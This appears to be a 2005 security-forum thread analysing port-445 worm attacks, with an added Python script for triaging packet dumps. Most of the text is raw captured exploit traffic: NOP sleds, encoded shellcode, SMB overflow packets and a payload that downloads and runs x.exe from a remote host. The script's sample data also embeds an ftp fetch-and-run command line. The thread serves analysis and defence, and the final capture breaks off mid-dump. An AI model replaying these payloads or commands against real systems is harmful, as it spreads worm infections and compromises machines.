More 445 sample attacks
Given the heightened state of internet alerts (i.e. Infocon is at Yellow and SecurityFocus is at ThreatCon 2), I thought I'd capture some more 445 attacks and post them here.
First one of interest:
Blake
So what exactly would this try to do on a person's system?
I don't see anything that looks like a payload, not that I would know I guess LOL, other than the erase me stuff at the end. Or is this a DoS-type packet?
to Link Logger
It is building a file that contains FTP commands to fetch a file called eraseme_15.exe. What that exe does I do not know.
to Link Logger
I have a question for you, Mr Link Logger. That is one huge packet log and I've never seen them that big on my system... Can I assume you're running a "full packet log" in your firewall program and that's why it's so big? Just curious...
Just for info: I use SPF v5.5.2710, running an older PC here and that's the one that only works for me currently... Previously, when I had the full packet log running, I had problems with trojans, so I disabled mine (single PC, home ran, user acct mode, not Admin).....
Tks, Sherri
jvmorris
Probably a capture that Blake made using PortPeeker. You can find it via the website at www.linklogger.com, if that's what it is.
These are PortPeeker captures. Most attacks on 445 operate on the same principle: buffer overflow, execute some command to go and get the worm and then execute it. This one uses http to get the worm body. I'll capture some of the worm bodies and post them in the malware forum later.
Edit -> get the whole attack in there. Edit2 -> Typically I see thousands of these every day but this one actually looks interesting.
Blake
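As an added example (not code from this thread, nor from PortPeeker or Link Logger), here is a small Python triage script that reassembles a PortPeeker-style dump into bytes and checks it for what Blake reads off by eye: the SMB header, the long filler run of an overflow attempt, and an embedded ftp command file or download URL. The dump inside it is constructed for the demo (only the SMB Session Setup row is taken from the captures above); 192.0.2.1 and x.exe are placeholders.

```python
import re

# Constructed PortPeeker-style dump: offset, up to 16 hex bytes, ASCII column.
# Only the first row (the SMB Session Setup header) is taken from the captures
# above; the filler run and the ftp command-file fetch are made up for this demo.
SAMPLE_DUMP = """\
0 00 00 10 BF FF 53 4D 42 73 00 00 00 00 18 07 C8 .....SMBs.......
10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
30 90 42 90 42 90 42 90 42 65 63 68 6F 20 6F 70 65 .B.B.B.Becho ope
40 6E 20 31 39 32 2E 30 2E 32 2E 31 20 3E 3E 20 69 n 192.0.2.1 >> i
50 20 26 66 74 70 20 2D 6E 20 2D 73 3A 69 20 26 78  &ftp -n -s:i &x
60 2E 65 78 65 0D 0A .exe..
"""

HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}")
ROW = re.compile(r"\s*([0-9A-Fa-f]{1,4})\s+(.*?)\s*$")

# Strings an analyst reads off the tail of these packets by eye.
INDICATORS = {
    "ftp_script": re.compile(rb"ftp\s+-n\s+-s:\S+"),          # ftp driven by a script file
    "echo_redirect": re.compile(rb"echo\s[^&\r\n]*>>\s*\S+"),  # the lines building that file
    "url": re.compile(rb"https?://[\x21-\x7e]+"),             # URLDownloadToFileA-style fetch
    "exe_name": re.compile(rb"[\w.-]+\.exe"),
}


def printable(data: bytes) -> str:
    """Render bytes the way the dump's ASCII column does."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


def parse_dump_line(line: str):
    """Return (offset, bytes) for one dump row, or None for header/noise lines.

    The ASCII column can itself look like hex pairs ("42 42 BB"), so the byte
    count k is the one where the hex pairs and the ASCII column agree.
    """
    m = ROW.match(line)
    if not m:
        return None
    offset, rest = int(m.group(1), 16), m.group(2)
    fallback = None
    for k in range(16, 0, -1):
        hex_end = 3 * k - 1
        if len(rest) > hex_end and rest[hex_end] != " ":
            continue                                 # hex segment must end at a space
        pairs = rest[:hex_end].split(" ")
        if len(pairs) != k or not all(HEX_PAIR.fullmatch(p) for p in pairs):
            continue
        data = bytes(int(p, 16) for p in pairs)
        if rest[hex_end + 1:] == printable(data).rstrip(" "):
            return offset, data                      # both columns agree: unambiguous
        fallback = fallback or (offset, data)        # keep if ASCII column got mangled
    return fallback


def parse_dump(text: str) -> bytes:
    """Reassemble the payload bytes of a dump, in row order, skipping non-rows."""
    out = bytearray()
    for line in text.splitlines():
        row = parse_dump_line(line)
        if row:
            out += row[1]
    return bytes(out)


def longest_run(data: bytes):
    """(byte, length) of the longest run of one repeated byte; a long run of
    'A' or NOPs is the padding region of an overflow attempt."""
    best = cur = (None, 0)
    for b in data:
        cur = (b, cur[1] + 1) if b == cur[0] else (b, 1)
        if cur[1] > best[1]:
            best = cur
    return best


def triage(data: bytes, min_run: int = 32) -> dict:
    """Summarise one captured payload: transport, padding, and embedded commands."""
    smb = data[4:8] == b"\xffSMB"                    # 4-byte NetBIOS header, then SMB
    found = {name: [m.decode("ascii", "replace") for m in rx.findall(data)]
             for name, rx in INDICATORS.items()}
    run_byte, run_len = longest_run(data)
    return {
        "smb": smb,
        "smb_command": data[8] if smb and len(data) > 8 else None,  # 0x73 = Session Setup AndX
        "longest_run": (run_byte, run_len),
        "indicators": found,
        "suspicious": run_len >= min_run or any(found.values()),
    }


if __name__ == "__main__":
    for key, value in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```

A real capture pasted from PortPeeker can be fed to parse_dump as-is; the "IP : port TCP Data In ..." header lines are skipped because they do not parse as rows.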
Anon
2005-Aug-13 3:14 pm
to jvmorris
It is probably linked to the publication of the PoCs of MS flaws on one of the 0day exploit sites... anyway it is related to "2005-08-11 : Microsoft Windows 2000 Plug and Play Universal Remote Exploit #1 (MS05-039)" and is targeting 139 & 445.
Fasten your seat belt...
The usual from China:
1B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 200 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 210 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 220 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 230 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 240 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 250 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 260 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 270 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 280 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 290 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 300 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 310 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 320 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 330 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 340 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 350 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 360 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 
370 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 380 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 390 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 400 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 410 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 420 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 430 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 440 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 450 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 460 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 470 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 480 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 490 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 500 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 510 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 520 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 
530 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 540 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 550 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 560 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 570 90 00 90 00 90 00 90 00 90 00 ..........
217.44.101.66 : 24463 TCP Data In Length 1544 bytes MD5 = D988D4D551FF9232FEB9BDD7B9F58DF7 ---- 13/08/2005 09:42:30.075 0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 10 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 20 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 30 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 40 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 50 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 60 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 70 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 80 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 90 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 100 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 110 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 120 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 130 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 140 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 150 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 160 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 170 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 180 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 190 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 
1B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 1F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 200 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 210 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 220 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 230 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 240 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 250 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 260 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 270 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 280 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 290 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 2F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 300 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 310 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 320 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 330 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 340 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 350 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 360 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 
370 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 380 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 390 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 3F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 400 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 410 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 420 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 430 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 440 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 450 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 460 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 470 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 480 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 490 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4A0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4B0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4C0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4D0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4E0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 4F0 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 500 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 510 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 520 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 
530 90 00 90 00 90 00 90 00 90 00 90 00 3C 00 12 00 ............<... 540 15 00 75 00 90 00 90 00 90 00 90 00 90 00 90 00 ..u............. 550 90 00 90 00 90 00 90 00 90 00 90 00 EB 00 58 00 ..............X. 560 68 00 74 00 74 00 70 00 3A 00 2F 00 2F 00 31 00 h.t.t.p.:././.1. 570 30 00 2E 00 33 00 2E 00 37 00 2E 00 32 00 31 00 0...3...7...2.1. 580 3A 00 37 00 34 00 36 00 37 00 2F 00 78 00 2E 00 :.7.4.6.7./.x... 590 65 00 78 00 65 00 DF 00 DF 00 DF 00 DF 00 DF 00 e.x.e........... 5A0 DF 00 DF 00 DF 00 DF 00 DF 00 DF 00 DF 00 DF 00 ................ 5B0 DF 00 DF 00 DF 00 4D 00 6F 00 7A 00 69 00 6C 00 ......M.o.z.i.l. 5C0 6C 00 61 00 2F 00 34 00 2E 00 30 00 DF 00 5D 00 l.a./.4...0...]. 5D0 33 00 C9 00 66 00 B9 00 EE 00 01 00 8D 00 75 00 3...f.........u. 5E0 05 00 8B 00 FE 00 8A 00 06 00 3C 00 99 00 75 00 ..........<...u. 5F0 05 00 46 00 8A 00 06 00 2C 00 30 00 46 00 34 00 ..F.....,.0.F.4. 600 99 00 88 00 07 00 47 00 ......G.
217.44.101.66 : 24463 TCP Data In Length 1402 bytes MD5 = 2066FD703988D22313E7F2E9DAFDDB49 ---- 13/08/2005 09:42:30.576 0 00 00 0F D8 FF 53 4D 42 25 00 00 00 00 18 07 C8 .....SMB%....... 10 00 00 00 00 00 00 00 00 00 00 00 00 00 08 18 01 ................ 20 00 08 70 00 10 00 00 84 0F 00 00 00 04 00 00 00 ..p............. 30 00 00 00 00 00 00 00 00 00 54 00 84 0F 54 00 02 .........T...T.. 40 00 26 00 00 40 95 0F 00 5C 00 50 00 49 00 50 00 .&..@...\.P.I.P. 50 45 00 5C 00 00 00 00 00 05 00 00 02 10 00 00 00 E.\............. 60 84 0F 00 00 01 00 00 00 6C 0F 00 00 00 00 09 00 ........l....... 70 E2 00 ED 00 EB 00 0A 00 E8 00 DA 00 FF 00 FF 00 ................ 80 FF 00 2E 00 62 00 65 00 67 00 2E 00 71 00 93 00 ....b.e.g...q... 90 99 00 C9 00 99 00 C9 00 99 00 C9 00 12 00 FD 00 ................ A0 BD 00 91 00 FD 00 16 00 99 00 C9 00 C1 00 72 00 ..............r. B0 68 00 AA 00 42 00 FD 00 66 00 AA 00 FD 00 10 00 h...B...f....... C0 BA 00 14 00 1C 00 A9 00 98 00 99 00 C9 00 99 00 ................ D0 C9 00 C9 00 F3 00 98 00 F1 00 98 00 99 00 C9 00 ................ E0 86 00 99 00 C9 00 71 00 C0 00 98 00 99 00 C9 00 ......q......... F0 99 00 C9 00 90 00 5F 00 CB 00 37 00 92 00 59 00 ......_...7...Y. 100 96 00 1C 00 78 00 99 00 C9 00 99 00 C9 00 99 00 ....x........... 110 C9 00 14 00 E4 00 57 00 71 00 7D 00 99 00 C9 00 ......W.q.}..... 120 99 00 C9 00 99 00 C9 00 14 00 E4 00 3A 00 71 00 ............:.q. 130 45 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 F3 00 E............... 140 9D 00 F1 00 99 00 C9 00 89 00 99 00 C9 00 99 00 ................ 150 C9 00 F1 00 99 00 C9 00 99 00 C9 00 9C 00 99 00 ................ 160 C9 00 F3 00 99 00 C9 00 71 00 B3 00 98 00 99 00 ........q....... 170 C9 00 99 00 C9 00 67 00 F3 00 E3 00 F0 00 10 00 ......g......... 180 1C 00 DC 00 98 00 99 00 C9 00 99 00 C9 00 B2 00 ................ 190 59 00 C9 00 C9 00 F3 00 9B 00 C9 00 C9 00 F1 00 Y............... 1A0 99 00 C9 00 99 00 C9 00 99 00 C9 00 D9 00 14 00 ................ 
1B0 04 00 A1 00 98 00 99 00 C9 00 99 00 C9 00 CA 00 ................ 1C0 71 00 9E 00 98 00 99 00 C9 00 99 00 C9 00 8D 00 q............... 1D0 68 00 61 00 91 00 10 00 1C 00 AD 00 98 00 99 00 h.a............. 1E0 C9 00 99 00 C9 00 1A 00 61 00 66 00 96 00 1D 00 ........a.f..... 1F0 11 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 B2 00 ................ 200 50 00 C8 00 C8 00 C8 00 F3 00 98 00 14 00 DC 00 P............... 210 57 00 C9 00 71 00 25 00 99 00 C9 00 99 00 C9 00 W...q.%......... 220 99 00 C9 00 4E 00 A4 00 C0 00 91 00 12 00 49 00 ....N.........I. 230 92 00 59 00 ED 00 F7 00 B2 00 59 00 C9 00 C9 00 ..Y.......Y..... 240 C9 00 C9 00 14 00 C4 00 3A 00 CA 00 CB 00 71 00 ........:.....q. 250 3B 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 FF 00 ;............... 260 24 00 E4 00 21 00 92 00 59 00 ED 00 CF 00 CD 00 $...!...Y....... 270 CD 00 F1 00 99 00 C9 00 99 00 C9 00 9C 00 99 00 ................ 280 C9 00 66 00 2C 00 DC 00 98 00 99 00 C9 00 99 00 ..f.,........... 290 C9 00 C9 00 71 00 1E 00 99 00 C9 00 99 00 C9 00 ....q........... 2A0 99 00 C9 00 FB 00 B0 00 B8 00 83 00 C3 00 CD 00 ................ 2B0 12 00 5D 00 F3 00 99 00 C9 00 C9 00 CB 00 66 00 ..]...........f. 2C0 2C 00 DC 00 98 00 99 00 C9 00 99 00 C9 00 66 00 ,.............f. 2D0 2C 00 AD 00 98 00 99 00 C9 00 99 00 C9 00 71 00 ,.............q. 2E0 0B 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 5A 00 ..............Z. 2F0 48 00 A6 00 96 00 C0 00 66 00 2C 00 AD 00 98 00 H.......f.,..... 300 99 00 C9 00 99 00 C9 00 71 00 1B 00 99 00 C9 00 ........q....... 310 99 00 C9 00 99 00 C9 00 4C 00 29 00 A7 00 EB 00 ........L.)..... 320 F3 00 9C 00 14 00 04 00 A1 00 98 00 99 00 C9 00 ................ 330 99 00 C9 00 CA 00 71 00 E9 00 99 00 C9 00 99 00 ......q......... 340 C9 00 99 00 C9 00 34 00 F4 00 26 00 71 00 F3 00 ......4...&.q... 350 99 00 C9 00 71 00 FC 00 99 00 C9 00 99 00 C9 00 ....q........... 360 99 00 C9 00 F9 00 3B 00 13 00 EF 00 29 00 46 00 ......;.....).F. 
370 6B 00 37 00 5F 00 DE 00 66 00 99 00 C9 00 5A 00 k.7._...f.....Z. 380 EC 00 A8 00 A0 00 99 00 C9 00 99 00 C9 00 99 00 ................ 390 C9 00 99 00 C9 00 99 00 C9 00 B7 00 C5 00 FF 00 ................ 3A0 ED 00 E9 00 EC 00 E9 00 FD 00 B7 00 FC 00 E1 00 ................ 3B0 FC 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 99 00 ................ 3C0 C9 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 99 00 ................ 3D0 C9 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 99 00 ................ 3E0 C9 00 99 00 C9 00 CA 00 F5 00 FC 00 FC 00 E9 00 ................ 3F0 99 00 C9 00 F2 00 FC 00 EB 00 F7 00 FC 00 F5 00 ................ 400 AA 00 AB 00 99 00 C9 00 C7 00 34 00 F9 00 AA 00 ..........4..... 410 59 00 B4 00 25 00 2A 00 2A 00 66 00 C9 00 AC 00 Y...%.*.*.f..... 420 93 00 90 00 81 00 B7 00 C9 00 9C 00 90 00 9D 00 ................ 430 63 00 83 00 C9 00 CD 00 71 00 92 00 99 00 C9 00 c.......q....... 440 99 00 C9 00 99 00 C9 00 BF 00 19 00 35 00 51 00 ............5.Q. 450 14 00 FD 00 BD 00 95 00 0A 00 72 00 91 00 C7 00 ..........r..... 460 34 00 F9 00 71 00 C8 00 99 00 C9 00 99 00 C9 00 4...q........... 470 99 00 C9 00 12 00 D2 00 A5 00 12 00 D5 00 80 00 ................ 480 E1 00 9A 00 52 00 AA 00 6F 00 14 00 8D 00 2A 00 ....R...o.....*. 490 9A 00 C8 00 B9 00 12 00 8B 00 9A 00 4A 00 AA 00 ............J... 4A0 59 00 58 00 59 00 9E 00 AB 00 9B 00 DB 00 19 00 Y.X.Y........... 4B0 A3 00 99 00 C9 00 EC 00 6C 00 A2 00 DD 00 BD 00 ........l....... 4C0 85 00 ED 00 9E 00 DF 00 A2 00 E8 00 81 00 EB 00 ................ 4D0 44 00 55 00 12 00 C8 00 BD 00 9A 00 4A 00 96 00 D.U.........J... 4E0 2E 00 8D 00 EB 00 12 00 D8 00 85 00 9A 00 5A 00 ..............Z. 4F0 12 00 9D 00 09 00 9A 00 5A 00 10 00 DD 00 BD 00 ........Z....... 500 85 00 F8 00 10 00 1C 00 D0 00 98 00 99 00 C9 00 ................ 510 99 00 C9 00 66 00 49 00 66 00 7F 00 FD 00 FE 00 ....f.I.f...... 520 12 00 87 00 A9 00 99 00 C9 00 12 00 C2 00 95 00 ................ 530 12 00 C2 00 85 00 12 00 82 00 12 00 C2 00 91 00 ................ 
540 5A 00 B7 00 FC 00 F7 00 FD 00 B7 00 90 00 90 00 Z............... 550 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 560 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 570 90 00 90 00 90 00 90 00 90 00 ..........
217.44.101.66 : 24463 TCP Data In Length 1256 bytes MD5 = E0EDB1A4459647159AB7DD0F9BC73F78 ---- 13/08/2005 09:42:30.696 0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 10 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 20 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 40 00 00 00 00 9A A8 40 00 01 00 00 00 00 00 00 00 ......@......... 50 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 60 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 70 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 80 01 00 00 00 00 00 00 00 9A A8 40 00 01 00 00 00 ..........@..... 90 00 00 00 00 01 00 00 00 00 00 00 00 9A A8 40 00 ..............@. A0 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ B0 9A A8 40 00 01 00 00 00 00 00 00 00 01 00 00 00 ..@............. C0 00 00 00 00 31 31 31 31 31 31 31 31 31 31 31 31 ....111111111111 D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 100 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 110 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 120 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 130 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 140 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 150 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 160 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 170 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 180 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 190 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1B0 31 31 31 31 31 31 31 31 31 31 
31 31 31 31 31 31 1111111111111111 1C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 200 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 210 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 220 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 230 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 240 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 250 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 260 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 270 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 280 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 290 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2B0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 